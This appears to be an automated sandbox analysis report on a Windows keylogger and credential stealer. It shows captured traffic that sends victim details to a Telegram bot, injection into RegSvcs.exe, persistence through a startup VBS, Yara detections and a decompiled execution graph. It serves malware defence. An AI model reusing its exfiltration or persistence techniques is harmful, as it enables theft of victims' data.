                                                                                                              2025-01-10 22:19:42 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              19192.168.2.661868149.154.167.2204437076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:43 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:44:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                              Host: api.telegram.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:19:43 UTC344INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:19:43 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 55
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:19:43 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:17:19:06
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Desktop\6cicUo3f8g.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\6cicUo3f8g.exe"
                                                                                                              Imagebase:0x8e0000
                                                                                                              File size:1'033'728 bytes
                                                                                                              MD5 hash:D721EAB396039744DF30C1C4AC89386E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:2
                                                                                                              Start time:17:19:10
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\AppData\Local\Thebesian\toggeries.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\6cicUo3f8g.exe"
                                                                                                              Imagebase:0xae0000
                                                                                                              File size:1'033'728 bytes
                                                                                                              MD5 hash:D721EAB396039744DF30C1C4AC89386E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 83%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:3
                                                                                                              Start time:17:19:14
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\6cicUo3f8g.exe"
                                                                                                              Imagebase:0xaa0000
                                                                                                              File size:45'984 bytes
                                                                                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:6
                                                                                                              Start time:17:19:25
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs"
                                                                                                              Imagebase:0x7ff61b840000
                                                                                                              File size:170'496 bytes
                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:7
                                                                                                              Start time:17:19:25
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\AppData\Local\Thebesian\toggeries.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Thebesian\toggeries.exe"
                                                                                                              Imagebase:0xae0000
                                                                                                              File size:1'033'728 bytes
                                                                                                              MD5 hash:D721EAB396039744DF30C1C4AC89386E
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:8
                                                                                                              Start time:17:19:29
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Thebesian\toggeries.exe"
                                                                                                              Imagebase:0x240000
                                                                                                              File size:45'984 bytes
                                                                                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:3.4%
                                                                                                                Dynamic/Decrypted Code Coverage:0.5%
                                                                                                                Signature Coverage:6.8%
                                                                                                                Total number of Nodes:2000
                                                                                                                Total number of Limit Nodes:27
                                                                                                                execution_graph 104352 8e107d 104357 8e708b 104352->104357 104354 8e108c 104388 902d40 104354->104388 104358 8e709b __write_nolock 104357->104358 104391 8e7667 104358->104391 104362 8e715a 104403 90050b 104362->104403 104369 8e7667 59 API calls 104370 8e718b 104369->104370 104422 8e7d8c 104370->104422 104372 8e7194 RegOpenKeyExW 104373 91e8b1 RegQueryValueExW 104372->104373 104377 8e71b6 Mailbox 104372->104377 104374 91e943 RegCloseKey 104373->104374 104375 91e8ce 104373->104375 104374->104377 104387 91e955 _wcscat Mailbox __NMSG_WRITE 104374->104387 104426 900db6 104375->104426 104377->104354 104378 91e8e7 104436 8e522e 104378->104436 104379 8e79f2 59 API calls 104379->104387 104382 91e90f 104439 8e7bcc 104382->104439 104384 91e929 104384->104374 104386 8e3f74 59 API calls 104386->104387 104387->104377 104387->104379 104387->104386 104448 8e7de1 104387->104448 104513 902c44 104388->104513 104390 8e1096 104392 900db6 Mailbox 59 API calls 104391->104392 104393 8e7688 104392->104393 104394 900db6 Mailbox 59 API calls 104393->104394 104395 8e7151 104394->104395 104396 8e4706 104395->104396 104452 911940 104396->104452 104399 8e7de1 59 API calls 104400 8e4739 104399->104400 104454 8e4750 104400->104454 104402 8e4743 Mailbox 104402->104362 104404 911940 __write_nolock 104403->104404 104405 900518 GetFullPathNameW 104404->104405 104406 90053a 104405->104406 104407 8e7bcc 59 API calls 104406->104407 104408 8e7165 104407->104408 104409 8e7cab 104408->104409 104410 8e7cbf 104409->104410 104411 91ed4a 104409->104411 104476 8e7c50 104410->104476 104481 8e8029 104411->104481 104414 8e7173 104416 8e3f74 104414->104416 104415 91ed55 __NMSG_WRITE _memmove 104417 8e3f82 104416->104417 104421 8e3fa4 _memmove 104416->104421 104419 900db6 Mailbox 59 API calls 104417->104419 104418 900db6 Mailbox 59 API calls 104420 8e3fb8 104418->104420 104419->104421 104420->104369 104421->104418 104423 8e7da6 104422->104423 104425 8e7d99 104422->104425 104424 900db6 Mailbox 59 API calls 104423->104424 104424->104425 104425->104372 104429 900dbe 104426->104429 104428 900dd8 104428->104378 104429->104428 104431 900ddc std::exception::exception 104429->104431 104484 90571c 104429->104484 104501 9033a1 DecodePointer 104429->104501 104502 90859b RaiseException 104431->104502 104433 900e06 104503 9084d1 58 API calls _free 104433->104503 104435 900e18 104435->104378 104437 900db6 Mailbox 59 API calls 104436->104437 104438 8e5240 RegQueryValueExW 104437->104438 104438->104382 104438->104384 104440 8e7bd8 __NMSG_WRITE 104439->104440 104441 8e7c45 104439->104441 104443 8e7bee 104440->104443 104444 8e7c13 104440->104444 104442 8e7d2c 59 API calls 104441->104442 104447 8e7bf6 _memmove 104442->104447 104512 8e7f27 59 API calls Mailbox 104443->104512 104445 8e8029 59 API calls 104444->104445 104445->104447 104447->104384 104449 8e7df0 __NMSG_WRITE _memmove 104448->104449 104450 900db6 Mailbox 59 API calls 104449->104450 104451 8e7e2e 104450->104451 104451->104387 104453 8e4713 GetModuleFileNameW 104452->104453 104453->104399 104455 911940 __write_nolock 104454->104455 104456 8e475d GetFullPathNameW 104455->104456 104457 8e477c 104456->104457 104458 8e4799 104456->104458 104459 8e7bcc 59 API calls 104457->104459 104460 8e7d8c 59 API calls 104458->104460 104461 8e4788 104459->104461 104460->104461 104464 8e7726 104461->104464 104465 8e7734 104464->104465 104468 8e7d2c 104465->104468 104467 8e4794 104467->104402 104469 8e7d3a 104468->104469 104471 8e7d43 _memmove 104468->104471 104469->104471 104472 8e7e4f 104469->104472 104471->104467 104473 8e7e62 104472->104473 104475 8e7e5f _memmove 104472->104475 104474 900db6 Mailbox 59 API calls 104473->104474 104474->104475 104475->104471 104477 8e7c5f __NMSG_WRITE 104476->104477 104478 8e8029 59 API calls 104477->104478 104479 8e7c70 _memmove 104477->104479 104480 91ed07 _memmove 104478->104480 104479->104414 104482 900db6 Mailbox 59 API calls 104481->104482 104483 8e8033 104482->104483 104483->104415 104485 905797 104484->104485 104489 905728 104484->104489 104510 9033a1 DecodePointer 104485->104510 104487 90579d 104511 908b28 58 API calls __getptd_noexit 104487->104511 104491 905733 104489->104491 104492 90575b RtlAllocateHeap 104489->104492 104495 905783 104489->104495 104499 905781 104489->104499 104507 9033a1 DecodePointer 104489->104507 104491->104489 104504 90a16b 58 API calls __NMSG_WRITE 104491->104504 104505 90a1c8 58 API calls 4 library calls 104491->104505 104506 90309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104491->104506 104492->104489 104493 90578f 104492->104493 104493->104429 104508 908b28 58 API calls __getptd_noexit 104495->104508 104509 908b28 58 API calls __getptd_noexit 104499->104509 104501->104429 104502->104433 104503->104435 104504->104491 104505->104491 104507->104489 104508->104499 104509->104493 104510->104487 104511->104493 104512->104447 104514 902c50 __freefls@4 104513->104514 104521 903217 104514->104521 104520 902c77 __freefls@4 104520->104390 104538 909c0b 104521->104538 104523 902c59 104524 902c88 DecodePointer DecodePointer 104523->104524 104525 902cb5 104524->104525 104526 902c65 104524->104526 104525->104526 104584 9087a4 59 API calls 2 library calls 104525->104584 104535 902c82 104526->104535 104528 902d18 EncodePointer EncodePointer 104528->104526 104529 902cec 104529->104526 104533 902d06 EncodePointer 104529->104533 104586 908864 61 API calls __realloc_crt 104529->104586 104530 902cc7 104530->104528 104530->104529 104585 908864 61 API calls __realloc_crt 104530->104585 104533->104528 104534 902d00 104534->104526 104534->104533 104587 903220 104535->104587 104539 909c1c 104538->104539 104540 909c2f EnterCriticalSection 104538->104540 104545 909c93 104539->104545 104540->104523 104542 909c22 104542->104540 104569 9030b5 58 API calls 3 library calls 104542->104569 104546 909c9f __freefls@4 104545->104546 104547 909cc0 104546->104547 104548 909ca8 104546->104548 104557 909ce1 __freefls@4 104547->104557 104573 90881d 58 API calls 2 library calls 104547->104573 104570 90a16b 58 API calls __NMSG_WRITE 104548->104570 104550 909cad 104571 90a1c8 58 API calls 4 library calls 104550->104571 104553 909cd5 104555 909ceb 104553->104555 104556 909cdc 104553->104556 104554 909cb4 104572 90309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104554->104572 104560 909c0b __lock 58 API calls 104555->104560 104574 908b28 58 API calls __getptd_noexit 104556->104574 104557->104542 104562 909cf2 104560->104562 104563 909d17 104562->104563 104564 909cff 104562->104564 104576 902d55 104563->104576 104575 909e2b InitializeCriticalSectionAndSpinCount 104564->104575 104567 909d0b 104582 909d33 LeaveCriticalSection _doexit 104567->104582 104570->104550 104571->104554 104573->104553 104574->104557 104575->104567 104577 902d87 _free 104576->104577 104578 902d5e RtlFreeHeap 104576->104578 104577->104567 104578->104577 104579 902d73 104578->104579 104583 908b28 58 API calls __getptd_noexit 104579->104583 104581 902d79 GetLastError 104581->104577 104582->104557 104583->104581 104584->104530 104585->104529 104586->104534 104590 909d75 LeaveCriticalSection 104587->104590 104589 902c87 104589->104520 104590->104589 104591 91fe27 104604 8ff944 104591->104604 104593 91fe3d 104594 91fe53 104593->104594 104595 91febe 104593->104595 104693 8e9e5d 60 API calls 104594->104693 104613 8efce0 104595->104613 104597 91fe92 104598 91fe9a 104597->104598 104599 92089c 104597->104599 104694 94834f 59 API calls Mailbox 104598->104694 104695 949e4a 89 API calls 4 library calls 104599->104695 104603 91feb2 Mailbox 104605 8ff962 104604->104605 104606 8ff950 104604->104606 104608 8ff968 104605->104608 104609 8ff991 104605->104609 104696 8e9d3c 104606->104696 104611 900db6 Mailbox 59 API calls 104608->104611 104610 8e9d3c 60 API calls 104609->104610 104612 8ff95a 104610->104612 104611->104612 104612->104593 104716 8e8180 104613->104716 104615 8efd3d 104616 92472d 104615->104616 104678 8f06f6 104615->104678 104721 8ef234 104615->104721 104852 949e4a 89 API calls 4 library calls 104616->104852 104620 92488d 104625 8efe4c 104620->104625 104677 924742 104620->104677 104858 95a2d9 85 API calls Mailbox 104620->104858 104621 8efe3e 104621->104620 104621->104625 104856 9366ec 59 API calls 2 library calls 104621->104856 104622 924b53 104622->104677 104877 949e4a 89 API calls 4 library calls 104622->104877 104623 8f0517 104629 900db6 Mailbox 59 API calls 104623->104629 104624 9247d7 104624->104677 104854 949e4a 89 API calls 4 library calls 104624->104854 104625->104622 104632 9248f9 104625->104632 104725 8e837c 104625->104725 104639 8f0545 _memmove 104629->104639 104630 924848 104857 9360ef 59 API calls 2 library calls 104630->104857 104640 924917 104632->104640 104860 8e85c0 104632->104860 104635 924755 104635->104624 104853 8ef6a3 331 API calls 104635->104853 104637 9248b2 Mailbox 104637->104625 104859 9366ec 59 API calls 2 library calls 104637->104859 104647 900db6 Mailbox 59 API calls 104639->104647 104644 924928 104640->104644 104649 8e85c0 59 API calls 104640->104649 104641 8efea4 104650 924ad6 104641->104650 104651 8eff32 104641->104651 104671 8f0179 Mailbox _memmove 104641->104671 104642 92486b 104645 8e9ea0 331 API calls 104642->104645 104644->104671 104868 9360ab 59 API calls Mailbox 104644->104868 104645->104620 104646 900db6 59 API calls Mailbox 104654 8efdd3 104646->104654 104658 8f0106 _memmove 104647->104658 104649->104644 104876 949ae7 60 API calls 104650->104876 104652 900db6 Mailbox 59 API calls 104651->104652 104657 8eff39 104652->104657 104654->104621 104654->104623 104654->104635 104654->104639 104654->104646 104667 92480c 104654->104667 104654->104677 104822 8e9ea0 104654->104822 104657->104678 104732 8f09d0 104657->104732 104658->104671 104692 8f0162 104658->104692 104846 8e9c90 104658->104846 104659 8effe6 104672 8f0007 104659->104672 104676 8e8047 59 API calls 104659->104676 104660 8e9ea0 331 API calls 104662 924a87 104660->104662 104662->104677 104871 8e84c0 104662->104871 104664 8effb2 104664->104639 104664->104659 104664->104678 104855 949e4a 89 API calls 4 library calls 104667->104855 104670 924ab2 104875 949e4a 89 API calls 4 library calls 104670->104875 104671->104670 104675 8e9d3c 60 API calls 104671->104675 104671->104678 104679 900db6 59 API calls Mailbox 104671->104679 104680 8f0398 104671->104680 104686 924a1c 104671->104686 104691 924a4d 104671->104691 104820 8e8740 68 API calls __cinit 104671->104820 104821 8e8660 68 API calls 104671->104821 104869 945937 68 API calls 104671->104869 104870 8e89b3 69 API calls Mailbox 104671->104870 104672->104678 104681 924b24 104672->104681 104684 8f004c 104672->104684 104675->104671 104676->104672 104851 949e4a 89 API calls 4 library calls 104678->104851 104679->104671 104680->104603 104682 8e9d3c 60 API calls 104681->104682 104682->104622 104683 8f00d8 104685 8e9d3c 60 API calls 104683->104685 104684->104622 104684->104678 104684->104683 104687 8f00eb 104685->104687 104688 900db6 Mailbox 59 API calls 104686->104688 104687->104678 104809 8e82df 104687->104809 104688->104691 104691->104660 104692->104603 104693->104597 104694->104603 104695->104603 104697 8e9d4a 104696->104697 104702 8e9d78 Mailbox 104696->104702 104698 8e9d9d 104697->104698 104703 8e9d50 Mailbox 104697->104703 104709 8e8047 104698->104709 104699 8e9d64 104699->104702 104704 8e9d6f 104699->104704 104705 8e9dcc 104699->104705 104700 91fa0f 104700->104702 104714 936e8f 59 API calls 104700->104714 104702->104612 104703->104699 104703->104700 104704->104702 104707 91f9e6 VariantClear 104704->104707 104705->104702 104713 8e8cd4 59 API calls Mailbox 104705->104713 104707->104702 104710 8e805a 104709->104710 104711 8e8052 104709->104711 104710->104702 104715 8e7f77 59 API calls 2 library calls 104711->104715 104713->104702 104714->104702 104715->104710 104717 8e818f 104716->104717 104720 8e81aa 104716->104720 104718 8e7e4f 59 API calls 104717->104718 104719 8e8197 CharUpperBuffW 104718->104719 104719->104720 104720->104615 104722 8ef251 104721->104722 104723 8ef272 104722->104723 104878 949e4a 89 API calls 4 library calls 104722->104878 104723->104654 104726 8e838d 104725->104726 104727 91edbd 104725->104727 104728 900db6 Mailbox 59 API calls 104726->104728 104729 8e8394 104728->104729 104730 8e83b5 104729->104730 104879 8e8634 59 API calls Mailbox 104729->104879 104730->104632 104730->104641 104733 924cc3 104732->104733 104747 8f09f5 104732->104747 104939 949e4a 89 API calls 4 library calls 104733->104939 104735 8f0cfa 104735->104664 104737 8f0ee4 104737->104735 104739 8f0ef1 104737->104739 104937 8f1093 331 API calls Mailbox 104739->104937 104740 8f0a4b PeekMessageW 104808 8f0a05 Mailbox 104740->104808 104742 8f0ef8 LockWindowUpdate DestroyWindow GetMessageW 104742->104735 104745 8f0f2a 104742->104745 104744 924e81 Sleep 104744->104808 104748 925c58 TranslateMessage DispatchMessageW GetMessageW 104745->104748 104746 8f0ce4 104746->104735 104936 8f1070 10 API calls Mailbox 104746->104936 104747->104808 104940 8e9e5d 60 API calls 104747->104940 104941 936349 331 API calls 104747->104941 104748->104748 104750 925c88 104748->104750 104750->104735 104751 8f0ea5 TranslateMessage DispatchMessageW 104752 8f0e43 PeekMessageW 104751->104752 104752->104808 104753 924d50 TranslateAcceleratorW 104753->104752 104753->104808 104754 8e9e5d 60 API calls 104754->104808 104755 92581f WaitForSingleObject 104758 92583c GetExitCodeProcess CloseHandle 104755->104758 104755->104808 104757 8f0d13 timeGetTime 104757->104808 104793 8f0f95 104758->104793 104759 8f0e5f Sleep 104794 8f0e70 Mailbox 104759->104794 104760 8e8047 59 API calls 104760->104808 104761 8e7667 59 API calls 104761->104794 104762 925af8 Sleep 104762->104794 104764 900db6 59 API calls Mailbox 104764->104808 104766 90049f timeGetTime 104766->104794 104767 8f0f4e timeGetTime 104938 8e9e5d 60 API calls 104767->104938 104770 925b8f GetExitCodeProcess 104774 925ba5 WaitForSingleObject 104770->104774 104775 925bbb CloseHandle 104770->104775 104772 965f25 110 API calls 104772->104794 104773 8eb7dd 109 API calls 104773->104794 104774->104775 104774->104808 104775->104794 104777 8eb73c 304 API calls 104777->104808 104779 925874 104779->104793 104780 925078 Sleep 104780->104808 104781 925c17 Sleep 104781->104808 104783 8e7de1 59 API calls 104783->104794 104787 8e9ea0 304 API calls 104787->104808 104790 8efce0 304 API calls 104790->104808 104793->104664 104794->104761 104794->104766 104794->104770 104794->104772 104794->104773 104794->104779 104794->104780 104794->104781 104794->104783 104794->104793 104794->104808 104965 942408 60 API calls 104794->104965 104966 8e9e5d 60 API calls 104794->104966 104967 8e89b3 69 API calls Mailbox 104794->104967 104968 8eb73c 331 API calls 104794->104968 104969 9364da 60 API calls 104794->104969 104970 945244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104794->104970 104971 943c55 66 API calls Mailbox 104794->104971 104795 949e4a 89 API calls 104795->104808 104797 8e84c0 69 API calls 104797->104808 104798 8e9c90 59 API calls Mailbox 104798->104808 104799 8e82df 59 API calls 104799->104808 104800 8e7de1 59 API calls 104800->104808 104801 8e89b3 69 API calls 104801->104808 104802 9255d5 VariantClear 104802->104808 104803 93617e 59 API calls Mailbox 104803->104808 104804 92566b VariantClear 104804->104808 104805 925419 VariantClear 104805->104808 104806 936e8f 59 API calls 104806->104808 104807 8e8cd4 59 API calls Mailbox 104807->104808 104808->104740 104808->104744 104808->104746 104808->104751 104808->104752 104808->104753 104808->104754 104808->104755 104808->104757 104808->104759 104808->104760 104808->104762 104808->104764 104808->104767 104808->104777 104808->104787 104808->104790 104808->104793 104808->104794 104808->104795 104808->104797 104808->104798 104808->104799 104808->104800 104808->104801 104808->104802 104808->104803 104808->104804 104808->104805 104808->104806 104808->104807 104880 8ee6a0 104808->104880 104911 8ef460 104808->104911 104930 8e31ce 104808->104930 104935 8ee420 331 API calls 104808->104935 104942 966018 59 API calls 104808->104942 104943 949a15 59 API calls Mailbox 104808->104943 104944 93d4f2 59 API calls 104808->104944 104945 8e9837 104808->104945 104963 9360ef 59 API calls 2 library calls 104808->104963 104964 8e8401 59 API calls 104808->104964 104810 91eda1 104809->104810 104813 8e82f2 104809->104813 104811 91edb1 104810->104811 106049 9361a4 59 API calls 104810->106049 104814 8e831c 104813->104814 104815 8e8339 Mailbox 104813->104815 104816 8e85c0 59 API calls 104813->104816 104817 8e8322 104814->104817 104818 8e85c0 59 API calls 104814->104818 104815->104658 104816->104814 104817->104815 104819 8e9c90 Mailbox 59 API calls 104817->104819 104818->104817 104819->104815 104820->104671 104821->104671 104823 8e9ebf 104822->104823 104843 8e9eed Mailbox 104822->104843 104824 900db6 Mailbox 59 API calls 104823->104824 104824->104843 104825 8eb475 104826 8e8047 59 API calls 104825->104826 104841 8ea057 104826->104841 104827 8eb47a 104830 9209e5 104827->104830 104831 920055 104827->104831 104828 900db6 59 API calls Mailbox 104828->104843 104829 8e7667 59 API calls 104829->104843 106055 949e4a 89 API calls 4 library calls 104830->106055 106052 949e4a 89 API calls 4 library calls 104831->106052 104835 902d40 67 API calls __cinit 104835->104843 104836 8ea55a 106053 949e4a 89 API calls 4 library calls 104836->106053 104837 920064 104837->104654 104840 8e8047 59 API calls 104840->104843 104841->104654 104842 936e8f 59 API calls 104842->104843 104843->104825 104843->104827 104843->104828 104843->104829 104843->104831 104843->104835 104843->104836 104843->104840 104843->104841 104843->104842 104844 9209d6 104843->104844 106050 8ec8c0 331 API calls 2 library calls 104843->106050 106051 8eb900 60 API calls Mailbox 104843->106051 106054 949e4a 89 API calls 4 library calls 104844->106054 104848 8e9c9b 104846->104848 104847 8e9cd2 104847->104658 104848->104847 106056 8e8cd4 59 API calls Mailbox 104848->106056 104850 8e9cfd 104850->104658 104851->104616 104852->104677 104853->104624 104854->104677 104855->104677 104856->104630 104857->104642 104858->104637 104859->104637 104861 8e85ce 104860->104861 104867 8e85f6 104860->104867 104862 8e85dc 104861->104862 104863 8e85c0 59 API calls 104861->104863 104864 8e85e2 104862->104864 104865 8e85c0 59 API calls 104862->104865 104863->104862 104866 8e9c90 Mailbox 59 API calls 104864->104866 104864->104867 104865->104864 104866->104867 104867->104640 104868->104671 104869->104671 104870->104671 104872 8e84cb 104871->104872 104874 8e84f2 104872->104874 106057 8e89b3 69 API calls Mailbox 104872->106057 104874->104670 104875->104677 104876->104659 104877->104677 104878->104723 104879->104730 104881 8ee6d5 104880->104881 104882 923aa9 104881->104882 104885 8ee73f 104881->104885 104896 8ee799 104881->104896 104883 8e9ea0 331 API calls 104882->104883 104884 923abe 104883->104884 104893 8ee970 Mailbox 104884->104893 104973 949e4a 89 API calls 4 library calls 104884->104973 104887 8e7667 59 API calls 104885->104887 104885->104896 104886 8e7667 59 API calls 